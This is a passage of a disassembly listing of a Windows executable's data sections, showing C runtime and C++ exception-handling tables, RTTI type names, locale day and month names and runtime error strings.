dword_422828	dd 19930522h, 1, 422820h, 5 dup(0) ; DATA XREF:	.text:0041CDA4o
		dd 1
dword_42284C	dd 3, 42285Ch, 422EB0h,	422ECCh, 0 ; DATA XREF:	jlrllt49:0042281Co
		dd offset off_424008
		align 8
		dd 0FFFFFFFFh, 0
		dd 28h,	402C86h
dword_422878	dd 0FFFFFFFEh, 0	; DATA XREF: sub_402FD3+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403065
		align 8
dword_422898	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403373+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4033A9
		align 8
dword_4228B8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4036BE+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403778
		align 8
dword_4228D8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403795+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4038DA
		align 8
dword_4228F8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403A52+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 3Ah,	40h, 0
		align 8
dword_422918	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403B91+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403BE7
		align 8
dword_422938	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403C1F+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403C65
		align 8
dword_422958	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404248+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404305
		align 8
dword_422978	dd 0FFFFFFFEh, 0	; DATA XREF: .text:00404504o
		dd 0FFFFFF80h, 0
		dd 0FFFFFFFEh, 4046C9h,	4046CDh, 0FFFFFFFEh, 40468Fh, 4046A3h
dword_4229A0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404F60+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404FF8
		align 10h
dword_4229C0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405229+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40538A
		align 10h
dword_4229E0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405671+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4056DB
		align 10h
dword_422A00	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405826+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4058D1
		align 10h
dword_422A20	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405975+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_405A7E
		dd 0FFFFFFFEh, 0
		dd offset sub_405A8A
dword_422A48	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405EF4+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_405FAE
		align 8
dword_422A68	dd 0FFFFFFFEh, 0	; DATA XREF: sub_407FCB+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset loc_408081
		align 8
dword_422A88	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408515+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40857C
		align 8
dword_422AA8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408A61+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_408B7B
		align 8
dword_422AC8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408DA0+2o
		dd 0FFFFFF8Ch, 0
		dd 0FFFFFFFEh, 408FC9h,	408FCDh, 0
dword_422AE8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4090A1+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_409164
		align 8
dword_422B08	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40923E+2o
		db 0CCh
		db 3 dup(0FFh)
		align 8
		dd 0FFFFFFFEh, 0
		dd offset sub_40930F
		dd 2 dup(0)
		dd offset sub_4092DB
dword_422B30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40A90F+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40A9E1
		align 10h
dword_422B50	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B85C+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40B91C
		align 10h
		dd offset loc_40B8DE
		dd offset loc_40B8E8
dword_422B78	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B982+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40B9C5h,	40B9CEh, 40h, 2	dup(0)
		dd offset sub_40BAA5
		dd 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 3 dup(0)
		dd 2 dup(1), 422B94h
dword_422BC8	dd 19930522h, 2, 422BA4h, 1, 422BB4h, 3	dup(0) ; DATA XREF: .text:0041CDBFo
		dd 1, 0
dword_422BF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BABD+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40BBDD
		align 10h
		dd offset loc_40BB4D
		dd offset loc_40BB56
dword_422C18	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BC59+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40BDC4h,	40BDC8h, 0
dword_422C38	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BDD8+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40BE5Dh,	40BE61h
dword_422C54	dd 0			; DATA XREF: sub_40BFC7+162o
		dd offset sub_40B78F
		align 10h
		dd offset dword_422C64
dword_422C64	dd 2, 422C70h, 422ECCh,	0 ; DATA XREF: jlrllt49:00422C60o
		dd offset off_424E50
		dd 0
		dd 0FFFFFFFFh, 0
		dd 0Ch,	40C31Dh, 0
dword_422C90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C419+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C439h,	40C43Dh, 0
dword_422CB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C465+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C489h,	40C48Dh, 0
dword_422CD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D0D4+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 40D15Ah,	40D171h, 0
dword_422CF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D212+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40D258h,	40D26Ch, 0
dword_422D10	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D301+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40D410
		align 10h
dword_422D30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D9E0+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40DAB2
		align 10h
dword_422D50	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40DF0F+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E006
		align 10h
dword_422D70	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E02D+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E16B
		align 10h
dword_422D90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E2E9+2o
		dd 0FFFFFFC0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E457
		align 10h
dword_422DB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E593+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E629
		align 10h
dword_422DD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40EC70+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40ED09
		align 10h
dword_422DF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F3AE+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F440
		align 10h
dword_422E10	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F470+2o
		dd 0FFFFFFC8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F606
		dd 2 dup(0)
		dd offset sub_40F53D
dword_422E38	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F60F+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F6E6
		align 8
dword_422E58	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40FD49+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40FD66h,	40FD82h, 0
dword_422E78	dd 0FFFFFFFEh, 0	; DATA XREF: sub_41069A+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 4106C7h,	4106E3h, 0
		dd offset off_427BC8
		align 10h
		dd 0FFFFFFFFh, 0
		dd 28h,	4013CEh, 0
		dd offset off_427BE8
		dd 0
		dd 0FFFFFFFFh, 0
		dd 28h,	4013E6h, 0
		dd offset off_427C08
		align 8
		dd 0FFFFFFFFh, 0
dword_422EE0	dd 0Ch,	403200h, 3, 422E94h, 422EB0h, 422ECCh
					; DATA XREF: jlrllt49:00422F04o
dword_422EF8	dd 0			; DATA XREF: sub_40121E+48o
					; sub_4016BA+48o ...
		dd offset loc_4010E1
		dd 0
		dd offset dword_422EE0+8
		dd 0
		dd offset off_427C24
		dd 0
		dd 0FFFFFFFFh, 0
dword_422F1C	dd 0Ch,	401637h, 2, 422F08h, 422ECCh ; DATA XREF: jlrllt49:00422F3Co
dword_422F30	dd 0			; DATA XREF: sub_4015ED+34o
					; sub_4035D9+54o
		dd offset sub_401038
		dd 0
		dd offset dword_422F1C+8
dword_422F40	dd 0FFFFFFFEh, 0	; DATA XREF: sub_41A3CC+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 5 dup(0)
		dd 0FFFFFFFFh, 41CE2Ah
dword_422F70	dd 19930522h, 1, 422F68h, 5 dup(0) ; DATA XREF:	.text:0041CE45o
		dd 1, 0FFFFFFFFh, 41CE4Fh
dword_422F9C	dd 19930522h, 1, 422F94h, 5 dup(0) ; DATA XREF:	.text:0041CE6Ao
		dd 1, 0FFFFFFFFh, 41CE74h
dword_422FC8	dd 19930522h, 1, 422FC0h, 5 dup(0) ; DATA XREF:	.text:0041CEA5o
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 0
		dd 1, 0
		dd 1, 0
		dd 40h,	2 dup(0)
		dd offset sub_40150F
		dd 40h,	2 dup(0)
		dd offset byte_40149D
		dd 2 dup(2), 3,	1, 423010h, 2 dup(0)
		dd 3, 1, 423020h
dword_423058	dd 19930522h, 4, 422FF0h, 2, 423030h, 3	dup(0) ; DATA XREF: sub_41CDC9+11o
		dd 1, 0
		dd 0FFFFFFFFh, 41CDE4h
dword_423088	dd 19930522h, 1, 423080h, 5 dup(0) ; DATA XREF:	.text:0041CDFDo
		dd 1, 0
		dd 0FFFFFFFFh, 41CE07h
dword_4230B8	dd 19930522h, 1, 4230B0h, 5 dup(0) ; DATA XREF:	.text:0041CE20o
		dd 1, 0
		dd 0FFFFFFFFh, 41CEAFh
dword_4230E8	dd 19930522h, 1, 4230E0h, 5 dup(0) ; DATA XREF:	.text:0041CEC8o
		dd 1, 0
		dd 0FFFFFFFFh, 41CED2h
dword_423118	dd 19930522h, 1, 423110h, 5 dup(0) ; DATA XREF:	.text:0041CEF7o
		dd 1, 0
		dd 0FFFFFFFFh, 41CF01h
dword_423148	dd 19930522h, 1, 423140h, 5 dup(0) ; DATA XREF:	.text:0041CF2Co
		dd 1, 0
		dd 0FFFFFFFFh, 41CF36h
dword_423178	dd 19930522h, 1, 423170h, 5 dup(0) ; DATA XREF:	.text:0041CF67o
		dd 1, 0
		dd 0FFFFFFFFh, 41CF71h
dword_4231A8	dd 19930522h, 1, 4231A0h, 5 dup(0) ; DATA XREF:	.text:0041CF9Co
		dd 1, 0
		dd 0FFFFFFFFh, 41CFA6h
dword_4231D8	dd 19930522h, 1, 4231D0h, 5 dup(0) ; DATA XREF:	.text:0041CFD1o
		dd 1, 381h dup(0)
jlrllt49	ends

; Section 3. (virtual address 00024000)
; Virtual size			: 00015000 (  86016.)
; Section size in file		: 00015000 (  86016.)
; Offset to raw	data for section: 00024000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 424000h
		dd offset dword_41E320
		dd offset dword_41E320
off_424008	dd offset off_41E3AC	; DATA XREF: jlrllt49:0042209Co
					; jlrllt49:004220C4o ...
		align 10h
a_?avout_of_ran	db '.?AVout_of_range@std@@',0
		align 4
		dd offset dword_41E320
		dd offset dword_41E320
off_424030	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422100o
					; jlrllt49:00422120o
		align 8
a_?avtype_info@	db '.?AVtype_info@@',0
off_424048	dd offset dword_41E320	; DATA XREF: sub_4035C0+3o
		align 10h
dword_424050	dd 2			; DATA XREF: sub_40A074+42r
					; sub_40A214+19r ...
		align 10h
		dd offset sub_40B6DE
dword_424064	dd 0A5C8AAA9h		; DATA XREF: sub_401DED+9r
					; sub_401E90+9r ...
dword_424068	dd 5A375556h		; DATA XREF: sub_404C4E+AEr
					; sub_40B64A+29w ...
		align 10h
dword_424070	dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_404D81+29o
					; sub_404F60+63o ...
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	31h dup(0)
		dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
		dd 76757473h, 7A797877h, 0
		db    0
		align 2
aAbcdefghijklmn	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
		align 4
		dd 21h dup(0)
byte_424290	db 0			; DATA XREF: sub_405229+102w
		align 4
		dd 0Fh dup(0)
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	2 dup(0)
		dd 20h,	10000000h, 10001000h, 2	dup(0)
		dd 20000000h, 20002000h, 10h, 0
		dd 20000000h, 2	dup(0)
		dd 200000h, 20000000h, 0
		dd 10101000h, 5	dup(10101010h),	10101000h, 10101010h, 6	dup(20202020h)
		dd 20202000h, 20202020h, 20h, 0
byte_424398	db 0			; DATA XREF: sub_405229+11Ew
		align 4
		dd 0Fh dup(0)
		dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
		dd 77767574h, 7A7978h, 0
		dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
		dd 57565554h, 5A5958h, 0
		dd 83000000h, 0
		dd 9A0000h, 9E009Ch, 2 dup(0)
		dd 8A0000h, 0FF8E008Ch,	2 dup(0)
		dd 0AA0000h, 2 dup(0)
		dd 0B500h, 0BA0000h, 0
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
		dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
		dd 9FDEDDDCh
dword_424498	dd 0A22980h		; DATA XREF: sub_402CAD+41r
					; sub_404F60+4Cr ...
byte_42449C	db 1			; DATA XREF: sub_40507E+E3r
		db 2, 4, 8
dword_4244A0	dd 3A4h			; DATA XREF: sub_40507E:loc_4050BAr
dword_4244A4	dd 82798260h		; DATA XREF: sub_40507E+12Br
		dd 21h,	0
dword_4244B0	dd 0DFA6h		; DATA XREF: sub_40507E+C6r
		align 8
		dd 0A5A1h, 0
		dd 0FCE09F81h, 0
		dd 0FC807E40h, 0
		dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE40h, 0
		dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE41h, 0
		dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
		dd 0FE81h, 0
		dd 0FEA17E40h, 0
		dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
		dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
		dd offset dword_41EF60+4
dword_424594	dd 0FFFFFFFEh		; DATA XREF: sub_402CAD+2Cr
					; sub_402CAD+4Cr ...
dword_424598	dd 43h,	0		; DATA XREF: sub_4053E1:loc_4054DEo
					; sub_405521:loc_40556Co ...
dword_4245A0	dd 2, 15h dup(0)	; DATA XREF: sub_405633+28o
					; sub_405975+DAo ...
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd 2 dup(1), 3 dup(0)
		dd offset off_424F38
		dd 2 dup(0)
off_424668	dd offset asc_41ED60	; DATA XREF: sub_40F73F+Dr
					; sub_40F7BC+Dr ...
					; "	    (((((		   H"
		dd offset dword_41F168+80h
		dd offset dword_41F168+200h
		dd offset off_424E78
off_424678	dd offset dword_4245A0	; DATA XREF: sub_402CAD+24r
					; sub_405671+4Er ...
		dd 1
off_424680	dd offset dword_4245A0	; DATA XREF: sub_40AC16+17o
		dd offset dword_424070
dword_424688	dd 0Eh			; DATA XREF: sub_4056E7+13r
					; sub_405753+13r ...
dword_42468C	dd 0Dh			; DATA XREF: sub_4056E7+1r
					; sub_4056E7+1Er ...
dword_424690	dd 1			; DATA XREF: sub_405D58:loc_405D5Er
dword_424694	dd 16h			; DATA XREF: sub_405D58:loc_405D79r
		dd 2 dup(2), 3,	2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
		dd 9, 0Ch, 0Ah,	7, 0Bh,	8, 0Ch,	16h, 0Dh, 16h, 0Fh, 2
		dd 10h,	0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h,	2, 41h
		dd 0Dh,	43h, 2,	50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
		dd 59h,	0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h,	9, 6, 16h
		dd 80h,	0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
		dd 29h,	9Eh, 0Dh, 0A1h,	2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
		dd 11h,	0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4247F8	dd 0Ch			; DATA XREF: sub_405D93+9o
dword_4247FC	dd 8			; DATA XREF: sub_405DA6+9o
off_424800	dd offset dword_428178	; DATA XREF: sub_405E41:loc_405E7Ew
					; sub_405E8A+8o ...
dword_424804	dd 1			; DATA XREF: sub_405E41:loc_405E4Ar
		dd offset dword_428190
		dd 1, 2	dup(0)
		dd offset dword_4281A8
		dd 1, 4281C0h, 1, 2 dup(0)
		dd offset dword_4281D8
		dd 1, 4281F0h, 1, 428208h, 1, 2	dup(0)
		dd offset dword_428220
		dd 1, 2	dup(0)
		dd offset dword_428238
		dd 1, 428250h, 1, 428268h, 1, 2	dup(0)
		dd offset dword_428280
		dd 1, 428298h, 1, 4282B0h, 1, 22h dup(0)
dword_424920	dd 10h			; DATA XREF: sub_405E8A+2Ao
					; sub_405E8A+4Ao
off_424924	dd offset aNull_0	; DATA XREF: sub_406F97:loc_407485r
					; sub_406F97+7E7r
					; "(null)"
off_424928	dd offset aNull		; DATA XREF: sub_406F97+433r
					; "(null)"
		align 10h
off_424930	dd offset sub_4080AA	; DATA XREF: sub_407E1D+Er
					; sub_4080D9+45w
		align 10h
		dd offset dword_41E320
		align 10h
off_424950	dd offset dword_437820	; DATA XREF: sub_408644o
					; sub_40864A+52o ...
		align 8
		dd offset dword_437820
		dd 101h
dword_424960	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40864A+74o
		dd 1000h, 4 dup(0)
		dd 2, 0FFFFFFFEh, 6 dup(0)
		dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4249C0	dd 7Ch dup(0)		; DATA XREF: sub_40864A+A4o
dword_424BB0	dd 8 dup(0)		; DATA XREF: sub_40871B+Do
					; sub_40876D+Do
dword_424BD0	dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA	XREF: sub_403795:loc_403831o
					; sub_403795:loc_403876o ...
dword_424C00	dd 2			; DATA XREF: sub_40A074:loc_40A080r
off_424C04	dd offset aR6002FloatingP ; DATA XREF: sub_40A074:loc_40A1A4r
					; "R6002\r\n- floating point not loaded\r\n"
		dd 8, 41EAB4h, 9, 41EA88h, 0Ah,	41E9F0h, 10h, 41E9C4h
		dd 11h,	41E994h, 12h, 41E970h, 13h, 41E944h, 18h, 41E90Ch
		dd 19h,	41E8E4h, 1Ah, 41E8ACh, 1Bh, 41E874h, 1Ch, 41E84Ch
		dd 1Eh,	41E82Ch, 1Fh, 41E7C8h, 20h, 41E790h, 21h, 41E698h
		dd 22h,	41E5F8h, 78h, 41E5E8h, 79h, 41E5D8h, 7Ah, 41E5C8h
		dd 0FCh, 41E5C4h, 0FFh,	41E5B4h
byte_424CB8	db 0			; DATA XREF: sub_40A36D:loc_40A6CEr
					; sub_40A36D+36Fr
		align 4
		dd 2Fh dup(0)
		dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2	dup(0)
dword_424DB8	dd 1B3Fh		; DATA XREF: sub_40AF03+Dr
		align 10h
dword_424DC0	dd 0C0000005h, 0Bh, 0	; DATA XREF: sub_405826+1Do
					; sub_405975+6Eo
		dd 0C000001Dh, 4, 0
		dd 0C0000096h, 4, 0
		dd 0C000008Dh, 8, 0
		dd 0C000008Eh, 8, 0
		dd 0C000008Fh, 8, 0
		dd 0C0000090h, 8, 0
		dd 0C0000091h, 8, 0
		dd 0C0000092h, 8, 0
		dd 0C0000093h, 8, 0
dword_424E38	dd 3			; DATA XREF: sub_40AFD5+A1r
					; sub_40AFD5+C0r ...
dword_424E3C	dd 7			; DATA XREF: sub_40AFD5+A7r
					; sub_40AFD5+C6r ...
		dd 78h
dword_424E44	dd 0Ah			; DATA XREF: sub_40AFD5+22r
					; sub_40E2A8+4r
		dd offset dword_41E320
		dd offset sub_40B6DE
off_424E50	dd offset off_41E3AC	; DATA XREF: sub_40BFC7+128o
					; jlrllt49:00422148o ...
		align 8
a_?avbad_except	db '.?AVbad_exception@std@@',0
		dd offset asc_41ED60	; "	    (((((		   H"
		dd offset dword_41EF60+2
off_424E78	dd offset aSun		; DATA XREF: sub_4053E1+D9o
					; .data:00424674o
					; "Sun"
		dd offset aMon		; "Mon"
		dd offset aTue		; "Tue"
		dd offset aWed		; "Wed"
		dd offset aThu		; "Thu"
		dd offset aFri		; "Fri"
		dd offset aSat		; "Sat"
		dd offset aSunday	; "Sunday"
		dd offset aMonday	; "Monday"
		dd offset aTuesday	; "Tuesday"
		dd offset aWednesday	; "Wednesday"
		dd offset aThursday	; "Thursday"
		dd offset aFriday	; "Friday"
		dd offset aSaturday	; "Saturday"
		dd offset aJan		; "Jan"
		dd offset aFeb		; "Feb"
		dd offset aMar		; "Mar"
		dd offset aApr		; "Apr"
		dd offset aMay		; "May"
		dd offset aJun		; "Jun"
		dd offset aJul		; "Jul"
		dd offset aAug		; "Aug"
		dd offset aSep		; "Sep"
		dd offset aOct		; "Oct"
		dd offset aNov		; "Nov"
		dd offset aDec		; "Dec"
		dd offset aJanuary	; "January"
		dd offset aFebruary	; "February"
		dd offset aMarch	; "March"
		dd offset aApril	; "April"
		dd offset aMay		; "May"
		dd offset aJune		; "June"
		dd offset aJuly		; "July"
		dd offset aAugust	; "August"
		dd offset aSeptember	; "September"
		dd offset aOctober	; "October"
		dd offset aNovember	; "November"
		dd offset aDecember	; "December"
		dd offset aAm		; "AM"
		dd offset aPm		; "PM"
		dd offset aMmDdYy	; "MM/dd/yy"
		dd offset aDdddMmmmDdYyyy ; "dddd, MMMM	dd, yyyy"
		dd offset dword_41F168+300h
		dd 409h, 2 dup(1), 424E78h
dword_424F34	dd 2Eh			; DATA XREF: .data:off_424F38o
off_424F38	dd offset dword_424F34	; DATA XREF: sub_4053E1+14o
					; sub_40CC84+Br ...
off_424F3C	dd offset dword_428778	; DATA XREF: sub_40CC84+1Dr
off_424F40	dd offset dword_428778	; DATA XREF: sub_40CC84+2Fr
off_424F44	dd offset dword_428778	; DATA XREF: sub_40CCC4+Cr
off_424F48	dd offset dword_428778	; DATA XREF: sub_40CCC4+1Er
off_424F4C	dd offset dword_428778	; DATA XREF: sub_40CCC4+30r
off_424F50	dd offset dword_428778	; DATA XREF: sub_40CCC4+42r
off_424F54	dd offset dword_428778	; DATA XREF: sub_40CCC4+54r
off_424F58	dd offset dword_428778	; DATA XREF: sub_40CCC4+66r
off_424F5C	dd offset dword_428778	; DATA XREF: sub_40CCC4+78r
		dd 2 dup(7F7F7F7Fh), 424F38h, 1, 2Eh, 1, 2 dup(0)
off_424F80	dd offset sub_41190A	; DATA XREF: sub_40DB5E:loc_40DB62r
					; sub_40FCCB+5w
off_424F84	dd offset sub_411006	; DATA XREF: sub_40FCCB+Aw
off_424F88	dd offset sub_410FC4	; DATA XREF: sub_40FCCB+14w
off_424F8C	dd offset sub_410FF8	; DATA XREF: sub_40FCCB+1Ew
off_424F90	dd offset word_410F6E	; DATA XREF: sub_40FCCB+28w
off_424F94	dd offset sub_41190A	; DATA XREF: sub_40FCCB+32w
off_424F98	dd offset sub_411884	; DATA XREF: sub_406F97+61Ar
					; sub_40FCCB+37w
off_424F9C	dd offset sub_410F84	; DATA XREF: sub_409427+5F1r
					; sub_40FCCB+41w
off_424FA0	dd offset sub_410EEE	; DATA XREF: sub_406F97+65Fr
					; sub_40FCCB+4Bw
off_424FA4	dd offset sub_410E7D	; DATA XREF: sub_406F97+640r
					; sub_40FCCB+55w
		align 10h
dword_424FB0	dd 19930520h, 3	dup(0)	; DATA XREF: sub_40F214+2o
					; sub_40F21D+2o
dword_424FC0	dd 2694h		; DATA XREF: sub_4103B4+3r
					; sub_410407+5Dr
		dd 9875h, 9873h, 0
dword_424FD0	dd 14h			; DATA XREF: sub_410316:loc_41031Er
off_424FD4	dd offset aExp		; DATA XREF: sub_410316:loc_41038Er
					; "exp"
		dd 1Dh,	41EC38h, 1Ah, 41EC28h, 1Bh, 41EC2Ch, 1Fh, 41FE30h
		dd 13h,	41FE28h, 21h, 41FE20h, 0Eh, 41EC20h, 0Dh, 41EC18h
		dd 0Fh,	41EBFCh, 10h, 41FE18h, 5, 41FE10h, 1Eh,	41EBE0h
		dd 12h,	41EBDCh, 20h, 41EBD8h, 0Ch, 41EBF4h, 0Bh, 41EBECh
		dd 15h,	41FE08h, 1Ch, 41EBE4h, 19h, 41FE00h, 11h, 41FDF8h
		dd 18h,	41FDF0h, 16h, 41FDE8h, 17h, 41FDE0h, 22h, 41FDDCh
		dd 23h,	41FDD8h, 24h, 41FDD4h, 25h, 41FDCCh, 26h, 41FDC0h
dbl_4250B8	dq 1.797693134862316e308 ; DATA	XREF: sub_4100E0:loc_4101B0r
					; sub_4100E0:loc_4101B8r
		dd 0
		dd 0FFF80000h
dbl_4250C8	dq 1.797693134862316e308 ; DATA	XREF: sub_4100E0+89r
					; sub_4100E0+A4r ...
		dd 0
		dd 100000h, 0
		dd 80000000h
tbyte_4250E0	dt 2.3562723457267347066e313 ; DATA XREF: sub_410644+Br
					; sub_410644+1Er
		align 4
tbyte_4250EC	dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410644+30r
		align 4
dword_4250F8	dd 1			; DATA XREF: sub_41069A+1Cr
					; sub_41069A+4Cw
byte_4250FC	db 3			; DATA XREF: sub_41077D+1Br
					; sub_41077D:loc_4107BBr
		align 10h
		dd 7080h, 1, 0FFFFF1F0h, 0
dword_425110	dd 545350h, 0Fh	dup(0)	; DATA XREF: .data:00425190o
dword_425150	dd 544450h, 0Fh	dup(0)	; DATA XREF: .data:00425194o
		dd offset dword_425110
		dd offset dword_425150
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h,	0B5h, 0D4h, 0F3h
		dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
		dd 96h,	0B4h, 0D3h, 0F2h, 110h,	12Fh, 14Dh, 16Ch
dword_425218	dd 2			; DATA XREF: sub_410A9C+13r
					; sub_410A9C+4Fr ...
		align 10h
dword_425220	dd 0FFFFFFFEh		; DATA XREF: sub_411A0A:loc_411A23r
dword_425224	dd 0FFFFFFFEh		; DATA XREF: sub_410A9C+1Br
					; sub_410A9C:loc_410AC5r ...
		align 10h
